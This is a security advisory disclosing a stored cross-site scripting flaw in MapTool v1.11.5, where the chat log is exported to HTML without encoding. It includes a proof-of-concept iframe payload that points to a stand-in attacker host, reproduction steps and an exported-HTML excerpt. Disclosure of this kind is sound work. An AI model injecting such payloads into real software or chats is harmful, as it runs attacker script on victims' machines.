Document Title:
===============
MapTool v1.11.5 - Cross Site Scripting Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2319


Release Date:
=============
2022-10-11


Vulnerability Laboratory ID (VL-ID):
====================================
2319


Common Vulnerability Scoring System:
====================================
5.6


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
MapTool is a fully featured, flexible virtual tabletop. Not only does MapTool come with powerful tools for creating detailed maps
but also a chat function, an initiative tracker, and a detailed token management system to create characters, monsters, objects,
and anything you can imagine. MapTool's user interface is highly configurable, and features not being used can be hidden out of sight.
The latest version of MapTool can be found on GitHub. MapTool attempts to use Semantic Versioning to help groups know whether a change
may break their game or not so they can decide when to upgrade. Exciting new features can be tested in development (alpha or beta) builds,
but for your game where stability matters sticking to the major releases is recommended. MapTool campaigns saved in newer versions may not
work on older versions, so be careful with your campaign files when trying out development builds.

(Copy of the Homepage:https://wiki.rptools.info/index.php/MapTool  )
(Download Software:https://www.rptools.net/toolbox/download-rptools-products  )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent web vulnerability in the official MapTool v1.11.5 software.

Affected Product(s):
====================
Rptools
Product: MapTool v1.11.5 - (Windows) (Linux) (MacOS)


Vulnerability Disclosure Timeline:
==================================
2022-06-03: Researcher Notification & Coordination (Security Researcher)
2022-06-04: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2022-10-11: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted Authentication (Guest Privileges)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official MapTool v1.11.5 software.
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector
to compromise browser to web-application requests from the application-side.

The vulnerability is located in the Speicher den Nachrichtenverlauf (Save Message Logs) function that exports
without a secure encode of html entities. Thus allows remote attackers to send malicious payloads that are not
visible in the chat but being saved to the exported html file. Opening the html file directly executes the injected
script code payloads on the local computer system. The vulnerability can be used by actors to form malicious files
for malware, phishing or data exfiltration after locat compromise.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent
external redirects to malicious source and persistent manipulation of affected application modules.

Vulnerable Module(s):
[+] Chat

Affected Module(s):
[+] Speicher den Nachrichtenverlauf


Proof of Concept (PoC):
=======================
The persistent and non-persistent input validation web vulnerabilities can be exploited by remote attackers without user account and with or without low user interaction.
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.


PoC: Payload
<iframe src="http://evil.source/malicious.jsp?inject=<script>eval(name)</script>" name="alert(1337)"></iframe>


Manual steps to reproduce the vulnerability:
1. Install the linux, windows or macos map software
2. Open the chat and inject payload
3. Send the input to execute
4. Save the chat logs by settings (default html)
5. Open the exported html file with the chat communication
Note: Opening the file directly executes the payload
6. Successful reproduce of the non-persistent and persistent input validation vulnerability


PoC: Exploitation (test.html)
<table class="ava-msg">
<tbody><tr valign="top">
<td class="avatar">
</td>
<td class="message">
<span class="prefix">Anonymer Benutzer:</span> <span><font color="#000000">evil.source[MALICIOUS SCRIPT CODE EXECUTION POINT]</font></span>
</td>
</tr>
</tbody></table>
</div>
<div>
"antlr.collections.AST.equalsTree(antlr.collections.AST)" because
"this.tree" is null Fehler beim Ausführen des Ausdrucks .
</div>
<div>
Fehlerspur: chat
</div>
<div>
"antlr.collections.AST.equalsTree(antlr.collections.AST)" because
"this.tree" is null Fehler beim Ausführen des Ausdrucks .
</div>


Security Risk:
==============
The security risk of the persistent script code injection vulnerability in the maptool software is estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.com

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE